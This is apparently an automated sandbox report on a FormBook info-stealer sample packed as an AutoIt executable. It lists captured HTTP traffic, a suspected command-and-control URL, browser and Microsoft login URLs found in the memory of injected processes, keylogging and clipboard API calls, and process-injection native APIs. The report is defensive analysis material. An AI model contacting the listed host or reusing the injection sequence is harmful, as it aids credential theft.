                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Fri, 10 Jan 2025 20:47:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Fri, 10 Jan 2025 20:47:49 GMTContent-Type: text/htmlContent-Length: 168Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachedate: Fri, 10 Jan 2025 20:47:55 GMTserver: LiteSpeedcontent-encoding: gzipvary: Accept-Encodingtransfer-encoding: chunkedconnection: closeData Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e a7 70 31 12 28 97 c2 67 49 1c bf 1d 85 5f c8 38 7d 5a f4 0c 34 6b 29 60 2d 71 d3 19 eb 47 50 1b ed 51 fb c5 68 23 b9 17 0b 8e 6b 59 63 d4 0f c6 20 b5 f4 92 a9 c8 d5 8c 60 93 31 38 61 a5 be 8f bc 89 1a e9 17 da 04 74 2f bd c2 12 d2 38 85 9f c6 c3 57 b3 d2 fc cd 59 31 1d e6 8b 9e 52 f9 a1 45 2e 19 5c 76 16 1b b4 2e aa 8d 32 96 70 05 b6 98 71 66 ef af 1e 2a c3 77 0f 15 ab ef 97 36 40 0c 21 d9 45 1c c7 e7 b2 0d 64 99 f6 8f 8f c5 74 00 2c a6 fb ac c2 b2 43 de c3 12 b8 48 d3 34 87 96 d9 a5 d4 59 9c 37 94 62 06 da d8 96 29 48 d2 6e 3b 9d c5 dd 16 3e 5a 4a 6d 0c df 50 ad d1 cb 9a 51 76 4c bb c8 a1 95 4d 0e 27 12 e6 f0 8a 15 5c 34 4d 93 87 ec b9 5c bf 50 9d ad bc a1 dd a5 8e 9e 61 8c 4a 08 cf e9 02 8f 5b 1f 31 25 97 3a 83 9a 4c 40 9b 43 af 7c f6 3e 26 86 87 14 22 85 0d 25 10 a5 c3 64 67 1c b9 62 74 c6 2a 67 d4 ca 63 0e de 74 19 5c 87 5d fa d0 39 f5 88 1b ec 9f 42 24 87 1d 8f 9a 40 10 25 72 f2 1f 66 c9 bc 87 55 52 e3 91 f1 30 d5 c7 6c 86 a9 ca 28 4e a0 e4 32 29 9f 84 a2 9a 3d 07 8d 02 89 20 6c fe 04 4d 9c 68 3c 2a 9f d5 85 98 d1 ea ae bc 13 08 16 9d 59 d9 3a 74 fe ae d0 79 e4 54 8f 2b c5 c9 2c 0f 15 12 01 5a 03 46 83 17 d2 01 39 b3 46 7b 5e 4c 3b 02 98 92 8e e5 fe 7d 22 e9 be 68 9a 38 b4 67 59 ce 88 c9 3e fd de a1 8e 71 2e f5 32 0b a5 10 68 c2 a1 93 1f 05 b6 a8 98 97 6b cc 6b 85 cc 92 04 5e e4 4f 9e 1e f1 fa cc a3 24 4e 68 e6 75 fd a6 ef 42 cb 2b 63 39 da 3e 14 28 10 c8 3a c9 c1 2e 2b 76 19 8f fb 36 49 e6 57 14 b6 8d 9c 60 dc 6c 32 88 fb c0 78 08 9a cd e7 63 78 7a c5 93 eb 2b 3a 9e 0e 7d 5f 85 95 2d 6f 68 57 ae 76 54 1e 1b b4 24 64 b5 83 1f d2 e3 6d 87 34 f8 8d 15 dc f6 f2 91 f2 37 94 8d c3 a0 2f e3 6b e9 e8 b7 17 cc 9f 44 df 61 2d 34 b1 5f 4a 74 f0 5d d7 13 20 f5 83 25 0c 36 04 24 8c f3 a4 1c 59 d5 76 4c ef 80 69 3e 06 46 fe ac 6a ba 33 04 0b b1 fd bd 62 8d 02 43 7b 1e 2e 99 97 7e d2 86 93 e0 e6 c1 cc 70 94 c3 c1 ee 2f b4 ff 0d 2b 0f 61 e1 04 00 00 0d 0a Data Ascii: a2bdeTkk0^M'va;fc6[u')]I|ut9W*?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqf*w6@!Edt,CH4Y7b)Hn;>ZJmPQvLM'\4M\PaJ[1%:L@C|>&"%dgbt*gct\]9B$@%rfUR0l(N2)= lMh<*Y:tyT+,ZF9F{^L;}"h8gY>q.2hkk^O$Nhu
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachedate: Fri, 10 Jan 2025 20:47:57 GMTserver: LiteSpeedcontent-encoding: gzipvary: Accept-Encodingtransfer-encoding: chunkedconnection: closeData Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e a7 70 31 12 28 97 c2 67 49 1c bf 1d 85 5f c8 38 7d 5a f4 0c 34 6b 29 60 2d 71 d3 19 eb 47 50 1b ed 51 fb c5 68 23 b9 17 0b 8e 6b 59 63 d4 0f c6 20 b5 f4 92 a9 c8 d5 8c 60 93 31 38 61 a5 be 8f bc 89 1a e9 17 da 04 74 2f bd c2 12 d2 38 85 9f c6 c3 57 b3 d2 fc cd 59 31 1d e6 8b 9e 52 f9 a1 45 2e 19 5c 76 16 1b b4 2e aa 8d 32 96 70 05 b6 98 71 66 ef af 1e 2a c3 77 0f 15 ab ef 97 36 40 0c 21 d9 45 1c c7 e7 b2 0d 64 99 f6 8f 8f c5 74 00 2c a6 fb ac c2 b2 43 de c3 12 b8 48 d3 34 87 96 d9 a5 d4 59 9c 37 94 62 06 da d8 96 29 48 d2 6e 3b 9d c5 dd 16 3e 5a 4a 6d 0c df 50 ad d1 cb 9a 51 76 4c bb c8 a1 95 4d 0e 27 12 e6 f0 8a 15 5c 34 4d 93 87 ec b9 5c bf 50 9d ad bc a1 dd a5 8e 9e 61 8c 4a 08 cf e9 02 8f 5b 1f 31 25 97 3a 83 9a 4c 40 9b 43 af 7c f6 3e 26 86 87 14 22 85 0d 25 10 a5 c3 64 67 1c b9 62 74 c6 2a 67 d4 ca 63 0e de 74 19 5c 87 5d fa d0 39 f5 88 1b ec 9f 42 24 87 1d 8f 9a 40 10 25 72 f2 1f 66 c9 bc 87 55 52 e3 91 f1 30 d5 c7 6c 86 a9 ca 28 4e a0 e4 32 29 9f 84 a2 9a 3d 07 8d 02 89 20 6c fe 04 4d 9c 68 3c 2a 9f d5 85 98 d1 ea ae bc 13 08 16 9d 59 d9 3a 74 fe ae d0 79 e4 54 8f 2b c5 c9 2c 0f 15 12 01 5a 03 46 83 17 d2 01 39 b3 46 7b 5e 4c 3b 02 98 92 8e e5 fe 7d 22 e9 be 68 9a 38 b4 67 59 ce 88 c9 3e fd de a1 8e 71 2e f5 32 0b a5 10 68 c2 a1 93 1f 05 b6 a8 98 97 6b cc 6b 85 cc 92 04 5e e4 4f 9e 1e f1 fa cc a3 24 4e 68 e6 75 fd a6 ef 42 cb 2b 63 39 da 3e 14 28 10 c8 3a c9 c1 2e 2b 76 19 8f fb 36 49 e6 57 14 b6 8d 9c 60 dc 6c 32 88 fb c0 78 08 9a cd e7 63 78 7a c5 93 eb 2b 3a 9e 0e 7d 5f 85 95 2d 6f 68 57 ae 76 54 1e 1b b4 24 64 b5 83 1f d2 e3 6d 87 34 f8 8d 15 dc f6 f2 91 f2 37 94 8d c3 a0 2f e3 6b e9 e8 b7 17 cc 9f 44 df 61 2d 34 b1 5f 4a 74 f0 5d d7 13 20 f5 83 25 0c 36 04 24 8c f3 a4 1c 59 d5 76 4c ef 80 69 3e 06 46 fe ac 6a ba 33 04 0b b1 fd bd 62 8d 02 43 7b 1e 2e 99 97 7e d2 86 93 e0 e6 c1 cc 70 94 c3 c1 ee 2f b4 ff 0d 2b 0f 61 e1 04 00 00 0d 0a Data Ascii: a2bdeTkk0^M'va;fc6[u')]I|ut9W*?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqf*w6@!Edt,CH4Y7b)Hn;>ZJmPQvLM'\4M\PaJ[1%:L@C|>&"%dgbt*gct\]9B$@%rfUR0l(N2)= lMh<*Y:tyT+,ZF9F{^L;}"h8gY>q.2hkk^O$Nhu
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachedate: Fri, 10 Jan 2025 20:48:00 GMTserver: LiteSpeedcontent-encoding: gzipvary: Accept-Encodingtransfer-encoding: chunkedconnection: closeData Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a Data Ascii: a
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachecontent-length: 1249date: Fri, 10 Jan 2025 20:48:03 GMTserver: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75
                Source: TrOCMVbhcDRPP.exe, 00000009.00000002.3387326168.0000000005182000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jalan2.online
                Source: TrOCMVbhcDRPP.exe, 00000009.00000002.3387326168.0000000005182000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jalan2.online/lvda/
                Source: rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: rasdial.exe, 00000007.00000002.3384731505.0000000002B65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: rasdial.exe, 00000007.00000003.2632104261.00000000079C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: rasdial.exe, 00000007.00000002.3384731505.0000000002B65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
                Source: rasdial.exe, 00000007.00000002.3384731505.0000000002B65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: rasdial.exe, 00000007.00000002.3384731505.0000000002B65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: rasdial.exe, 00000007.00000002.3384731505.0000000002B65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: rasdial.exe, 00000007.00000002.3384731505.0000000002B87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_00134164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00134164
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_00134164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00134164
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_00133F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00133F66
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_0012001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0012001C
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_0014CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0014CABC

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3384177581.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2455586677.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3385458090.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3387326168.0000000005100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2455105837.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3385516192.0000000003BF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3381605146.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2456155033.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: This is a third-party compiled AutoIt script.0_2_000C3B3A
                Source: fFoOcuxK7M.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: fFoOcuxK7M.exe, 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a695c1c7-3
                Source: fFoOcuxK7M.exe, 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_e215243f-e
                Source: fFoOcuxK7M.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f86be1ad-1
                Source: fFoOcuxK7M.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_02648ffa-6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C8B3 NtClose,2_2_0042C8B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B60 NtClose,LdrInitializeThunk,2_2_03772B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03772DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03772C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037735C0 NtCreateMutant,LdrInitializeThunk,2_2_037735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774340 NtSetContextThread,2_2_03774340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774650 NtSuspendThread,2_2_03774650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BF0 NtAllocateVirtualMemory,2_2_03772BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BE0 NtQueryValueKey,2_2_03772BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BA0 NtEnumerateValueKey,2_2_03772BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B80 NtQueryInformationFile,2_2_03772B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AF0 NtWriteFile,2_2_03772AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AD0 NtReadFile,2_2_03772AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AB0 NtWaitForSingleObject,2_2_03772AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F60 NtCreateProcessEx,2_2_03772F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F30 NtCreateSection,2_2_03772F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FE0 NtCreateFile,2_2_03772FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FB0 NtResumeThread,2_2_03772FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FA0 NtQuerySection,2_2_03772FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F90 NtProtectVirtualMemory,2_2_03772F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E30 NtWriteVirtualMemory,2_2_03772E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EE0 NtQueueApcThread,2_2_03772EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EA0 NtAdjustPrivilegesToken,2_2_03772EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E80 NtReadVirtualMemory,2_2_03772E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D30 NtUnmapViewOfSection,2_2_03772D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D10 NtMapViewOfSection,2_2_03772D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D00 NtSetInformationFile,2_2_03772D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DD0 NtDelayExecution,2_2_03772DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DB0 NtEnumerateKey,2_2_03772DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C60 NtCreateKey,2_2_03772C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C00 NtQueryInformationProcess,2_2_03772C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CF0 NtOpenProcess,2_2_03772CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CC0 NtQueryVirtualMemory,2_2_03772CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CA0 NtQueryInformationToken,2_2_03772CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773010 NtOpenDirectoryObject,2_2_03773010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773090 NtSetValueKey,2_2_03773090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037739B0 NtGetContextThread,2_2_037739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773D70 NtOpenThread,2_2_03773D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773D10 NtOpenProcessToken,2_2_03773D10
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_0012A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0012A1EF
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_00118310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00118310
